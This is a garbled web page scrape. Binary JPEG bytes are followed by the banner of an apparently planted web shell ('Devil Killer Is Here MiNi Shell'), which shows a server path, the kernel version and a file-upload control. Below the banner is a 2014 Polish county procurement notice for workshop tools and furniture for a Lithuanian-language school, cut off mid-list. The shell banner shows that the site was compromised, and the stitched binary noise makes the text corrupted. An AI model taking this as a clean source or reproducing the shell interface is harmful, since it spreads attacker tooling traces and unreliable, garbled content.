JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140116/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140116/10651-N-2014.html

<p class="kh_header"><b>Sejny: Dostawa wyposażenia oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013.</b><br>
<b>Numer ogłoszenia: 10651 - 2014; data zamieszczenia: 16.01.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Sejneński , ul. 1-go Maja 1, 16-500 Sejny, woj. podlaskie, tel. 087 5162066, faks 087 5162013.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.sejny.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów oraz sprzętu w celu realizacji projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013.

1. Odkurzacz przemysłowy przystosowany do podłączenia m.in. wielofunkcyjnej maszyny stolarskiej do drewna - 1 szt.
Przeznaczony również do zbierania pyłów budowlanych i trocin. 
2. Frezarka elektryczna ręczna do drewna - 1 szt.
- komplet frezów
- włącznik pod odpowiednią osłoną, z zabezpieczeniem przypadkowego włączania,
- przyłącze do odsysania pyłów
3. Wyrzynarka ręczna elektryczna - 1 szt.
- możliwość podłączenia do odkurzacza przemysłowego,
Wyrzynarka powinna posiadać następujące parametry:
Silnik o mocy co najmniej 700 W i zmiennej prędkości pracy. Szybki i łatwy w obsłudze mechanizm beznarzędziowej wymiany brzeszczotów z chwytem typu T. Mechanizm antywibracyjny i gumowana rękojeść pozwalają na łatwą kontrolę pracy narzędzia. Co najmniej 4-stopniowe ustawianie pracy wahadłowej umożliwiającej cięcie bardziej szybkie i dokładne. Miękki rozruch umożliwiający dokładność od początku cięcia. System odsysania pyłu oczyszczający linię cięcia z wiórów.
Kompatybilna z brzeszczotem DT2074 do cięcia krawędziowego.
Dane techniczne:
Liczba suwów bez obciążenia od 0-3500 suwów/min
Długość skoku - ok. 26 mm +/- 2 mm
Kąt odchylenia od pionu - 45 °
Cięcie w drewnie - co najmniej 70 mm
Waga - do 3kg
4. Szlifierka taśmowa do obróbki drewna - 1 szt.
- przyłącze do odsysania pyłów 
- szlifierka powinna umożliwiać dokładne szlifowanie aż do samej krawędzi
Dane techniczne:
Pobór mocy od 700 W do 1400 W 
Prędkość taśmy ok. 500 m/min (+-50)
Długość taśmy 600-630 mm
Szerokość taśmy 100 mm
Ciężar do 6 kg 
Wyposażenie:
Worek na pył
1 taśma ścierna
Płyta grafitowa zamontowana
Płyta korkowa zamontowana
Instrukcja użytkownika w języku polskim


5. Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt.
Wiertarka winna mieć funkcję: wkręcanie-wykręcanie śrub, wkrętów do drewna, robienie otworów w drewnie oraz posiadać następującą charakterystykę:
- mechaniczna dwubiegowa przekładnia planetarna o dużej sile przewiercania, 
- kilkustopniowa regulacja momentu dokręcania oraz dwa stopnie wiercenia, układ elektroniczny umożliwiający delikatne wiercenie i wkręcanie,
- hamulec silnikowy umożliwiający dokładne wykonanie prac wkrętarskich, 
- uchwyt wiertarski szybkomocujący umożliwiający szybką wymianę narzędzia (rozwartość uchwytu wiertarskiego - 0,8-16 mm)
- uchwyt antypoślizgowy, 
- elektroniczny regulator obrotów 
Do wyposażenia powinno być dołączone:
- ładowarka, 
- akumulator - 2 sztuki,  
- walizka i akcesoria w postaci dodatkowych wierteł i otwornic do drewna o różnej średnicy, 
- uchwyt szybkomocujący,
6. Tokarka do drewna - 1 szt.,
Dane techniczne:
- rozstaw kłów ok. 1100 mm
- średnica obróbki - 350 do 370 mm
- obroty, bezstopniowo od ok. 500 - 2000 obr./min
- ciężar do 125 kg
- długość kopiowania ok. 850 mm
- wyłącznik wyzwalany przy zaniku napięcia
7. Żelazko z nawilżaczem oraz deską do prasowania - 1 szt.,
Żelazko winno posiadać:
Masa do 1.4 kg
Uderzenie pary: od 150 do 220 g/min
Długość przewodu: od 2,5 m do 3 m
Zbiornik wody: do 400 ml
Rodzaj stopy: stopa ceramiczna (stal szlachetna)
Moc: do 2600 W
Kontrola temperatury: Pokrętło
Wyrzut pary w pionie 
Funkcja samooczyszczania 
Zabezpieczenie przed przegrzaniem
Z funkcją automatycznego wyłączania (pozostawionego urządzenia bez nadzoru),
Deska winna posiadać:
długość całkowita deski wraz z podstawą pod żelazko: od 160 - 165 cm
wymiary powierzchni do prasowania: ok. 120-130 cm x 40-45 cm  
regulacja wysokości w zakresie od ok. 70 do 100 cm

8. Odkurzacz elektryczny - 1 szt.,
Moc silnika: 2200 W do 2500 W
Rodzaj worka: papierowy, 
Pojemność worka: od 4 L do 5 L 
Funkcje dodatkowe: automatyczne dostosowanie mocy ssania do odkurzanej powierzchni, automatyczne pozycjonowanie worka, automatyczne zwijanie kabla, łagodny start, sterowanie w rączce, sygnalizacja zabrudzenia filtra, wskaźnik zapełnienia worka, wyciszenie silnika Silence
Wyposażenie: rura teleskopowa, wąż ssący, ssawko-szczotka z przełącznikiem parkiet-dywan, ssawka mała, ssawka szczelinowa, ssawka do tapicerki, instrukcja obsługi w języku polskim, 


9. Stoliki klasowe - 20 szt.
- nogi stalowe z profilu okrągłego/kwadratowego mocowane do ramy, blat z płyty co najmniej 18 mm dwustronnie laminowanej - krawędzie oklejone 2 mm obrzeżem PCV. Stoły o wymiarach od: długość: 180-200 oraz szerokości od 70/80 cm, o standardowej wysokości, w kolorze olchy.

10. Szafy dwudrzwiowe typu ubraniowego z półkami i wieszakami - 6 szt.
		- 3 szafy przeznaczone na segregatory A-4, wysokość/szerokość/głębokość ok. 180/80/40 (+- 4 cm)
		- 3 szafy typu ubraniowego z wieszakami na ubrania, wysokość/szerokość/głębokość ok. 180/80/60 (+- 4 cm)
		- wykonane z płyty laminowanej w kolorze olcha
		- zamykane na zamek

11. Krzesła - 15 szt.
- tapicerowane siedzisko i oparcie koloru ciemno-szarego lub brązowego. Metalowa rama, chromowana lub malowana. Możliwość składowania w stosie do 10 szt. 

12. Rolety do okien - szerokość 2,80 m - 5 szt.,
Gramatura 160 - 180 gr/m2
Kolor uzgodniony zostanie w trakcie realizacji dostawy.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.71.34.30-6, 39.71.35.10-1, 42.62.00.00-8, 39.14.33.10-2, 39.13.21.00-7, 39.11.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający odstępuje od wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający oceni, czy Wykonawca spełnia ten warunek udziału w postępowaniu na podstawie złożonego wraz z ofertą oświadczenia o spełnieniu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W przypadku złożenia oferty wspólnej Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania. Dokument pełnomocnictwa powinien zostać podpisany przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym wykonawcę pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. Oferta musi być podpisana w taki sposób, aby prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany niniejszej umowy wymagają zgody obu Stron wyrażonej w formie pisemnej pod rygorem nieważności. Wprowadzenie jakichkolwiek zmian i nowych postanowień do niniejszej umowy możliwe jest tylko w granicach unormowania art. 144 ustawy Prawo Zamówień Publicznych (tekst jednolity Dz.U. z 2010, nr 113 poz. 759 z późn. zm.). Zamawiający przewiduje możliwość zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia. 
a) zmniejszenie wartości umowy jest możliwe w przypadku zmian parametrów asortymentu na równoważne lub wyższe z jednoczesnym obniżeniem ceny; 
b) w przypadku wystąpienia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony, możliwa jest zmiana postanowień umowy, wymaga to jednak zgody obu Stron umowy 
c) w przypadku wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, 
d) pozostałe zmiany: 
-siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ; 
-zmiana obowiązującej stawki VAT (jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający nie dopuszcza możliwości zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku zapłaconego przez Wykonawcę); 
-jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę. 
-rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty, które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi dostawami. 
-zmiana danych związanych z obsługą administracyjno - organizacyjną umowy (np. zmiana nr rachunku bankowego); 
-zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami; 
Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Pzp:</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.st.sejny.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Sejnach, ul. 1 Maja 1, 16-500 Sejny, pok. nr 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Sejnach, ul. 1 Maja 1, 16-500 Sejny, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie w 85 % współfinansowane z projektu LT-PL/132 Współpraca polsko-litewska w celu poprawy warunków życia dofinansowanego w ramach Programu Współpracy Transgranicznej Litwa - Polska na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> 1. Odkurzacz przemysłowy przystosowany do podłączenia m.in. wielofunkcyjnej maszyny stolarskiej do drewna - 1 szt.
2. Frezarka elektryczna ręczna do drewna - 1 szt.
3. Wyrzynarka ręczna elektryczna - 1 szt.
4. Szlifierka taśmowa do obróbki drewna - 1 szt.
5. Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt.
6. Tokarka do drewna - 1 szt.,
7. Żelazko z nawilżaczem oraz deską do prasowania - 1 szt.,
8. Odkurzacz elektryczny - 1 szt.,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Odkurzacz przemysłowy przystosowany do podłączenia m.in. wielofunkcyjnej maszyny stolarskiej do drewna - 1 szt.
Przeznaczony również do zbierania pyłów budowlanych i trocin. 

2. Frezarka elektryczna ręczna do drewna - 1 szt.
- komplet frezów
- włącznik pod odpowiednią osłoną, z zabezpieczeniem przypadkowego włączania,
- przyłącze do odsysania pyłów

3. Wyrzynarka ręczna elektryczna - 1 szt.
- możliwość podłączenia do odkurzacza przemysłowego,
Wyrzynarka powinna posiadać następujące parametry:
Silnik o mocy co najmniej 700 W i zmiennej prędkości pracy. Szybki i łatwy w obsłudze mechanizm beznarzędziowej wymiany brzeszczotów z chwytem typu T. Mechanizm antywibracyjny i gumowana rękojeść pozwalają na łatwą kontrolę pracy narzędzia. Co najmniej 4-stopniowe ustawianie pracy wahadłowej umożliwiającej cięcie bardziej szybkie i dokładne. Miękki rozruch umożliwiający dokładność od początku cięcia. System odsysania pyłu oczyszczający linię cięcia z wiórów.
Kompatybilna z brzeszczotem DT2074 do cięcia krawędziowego.
Dane techniczne:
Liczba suwów bez obciążenia od 0-3500 suwów min
Długość skoku - ok. 26 mm +- 2 mm
Kąt odchylenia od pionu - 45 °
Cięcie w drewnie - co najmniej 70 mm
Waga - do 3kg

4. Szlifierka taśmowa do obróbki drewna - 1 szt.
- przyłącze do odsysania pyłów 
- szlifierka powinna umożliwiać dokładne szlifowanie aż do samej krawędzi
Dane techniczne:
Pobór mocy od 700 W do 1400 W 
Prędkość taśmy ok. 500 m/min +-50
Długość taśmy 600-630 mm
Szerokość taśmy 100 mm
Ciężar do 6 kg 
Wyposażenie standardowe:
Worek na pył
1 taśma ścierna
Płyta grafitowa zamontowana
Płyta korkowa zamontowana
Instrukcja użytkownika w języku polskim

5. Wiertarka elektryczna ręczna, akumulatorowa, bez udarowa - 1 szt.
Wiertarka winna mieć funkcję: wkręcanie-wykręcanie śrub, wkrętów do drewna, robienie otworów w drewnie oraz posiadać następującą charakterystykę:
- mechaniczna dwubiegowa przekładnia planetarna o dużej sile przewiercania, 
- kilkustopniowa regulacja momentu dokręcania oraz dwa stopnie wiercenia, układ elektroniczny umożliwiający delikatne wiercenie i wkręcanie,
- hamulec silnikowy umożliwiający dokładne wykonanie prac wkrętarskich, 
- uchwyt wiertarski szybkomocujący umożliwiający szybką wymianę narzędzia (rozwartość uchwytu wiertarskiego - 0,8-16 mm)
- uchwyt antypoślizgowy, 
- elektroniczny regulator obrotów 
Do wyposażenia powinno być dołączone:
- ładowarka, 
- akumulator - 2 sztuki,  
- walizka i akcesoria w postaci dodatkowych wierteł i otwornic do drewna o różnej średnicy, 
- uchwyt szybkomocujący,

6. Tokarka do drewna - 1 szt.,
Dane techniczne:
- rozstaw kłów ok. 1100 mm
- średnica obróbki - 350 do 370 mm
- obroty, bezstopniowo od ok. 500 - 2000 obr.min
- ciężar do 125 kg
- długość kopiowania ok. 850 mm
- wyłącznik wyzwalany przy zaniku napięcia
7. Żelazko z nawilżaczem oraz deską do prasowania - 1 szt.,
Żelazko winno posiadać:
Masa do 1.4 kg
Uderzenie pary: od 150 do 220 gmin
Długość przewodu: od 2,5 m do 3 m
Zbiornik wody: do 400 ml
Rodzaj stopy: stopa ceramiczna (stal szlachetna)
Moc: do 2600 W
Kontrola temperatury: Pokrętło
Wyrzut pary w pionie 
Funkcja samooczyszczania 
Zabezpieczenie przed przegrzaniem
Z funkcją automatycznego wyłączania (pozostawionego urządzenia bez nadzoru),
Deska winna posiadać:
długość całkowita deski wraz z podstawą pod żelazko: od 160 - 165 cm
wymiary powierzchni do prasowania: ok. 120-130 cm x 40-45 cm  
regulacja wysokości w zakresie od ok. 70 do 100 cm


8. Odkurzacz elektryczny - 1 szt.,
Moc silnika: 2200 W do 2500 W
Rodzaj worka: papierowy, 
Pojemność worka: od 4 L do 5 L 
Funkcje dodatkowe: automatyczne dostosowanie mocy ssania do odkurzanej powierzchni, automatyczne pozycjonowanie worka, automatyczne zwijanie kabla, łagodny start, sterowanie w rączce, sygnalizacja zabrudzenia filtra, wskaźnik zapełnienia worka, wyciszenie silnika Silence 
Wyposażenie: rura teleskopowa, wąż ssący, ssawko-szczotka z przełącznikiem parkiet-dywan, ssawka mała, ssawka szczelinowa, ssawka do tapicerki, instrukcja obsługi w języku polskim, 


Okres gwarancji na asortyment wymieniony w części 1 nie może być krótszy niż 12 miesięcy.
Wykonawca dostarczy sprzęt transportem własnym do internatu Liceum Ogólnokształcącego z Litewskim Językiem Nauczania im. 11 Marca w Puńsku, ul. 11 Marca 16A.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.34.30-6, 39.71.35.10-1, 42.62.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> 1. Stoliki klasowe - 20 szt.
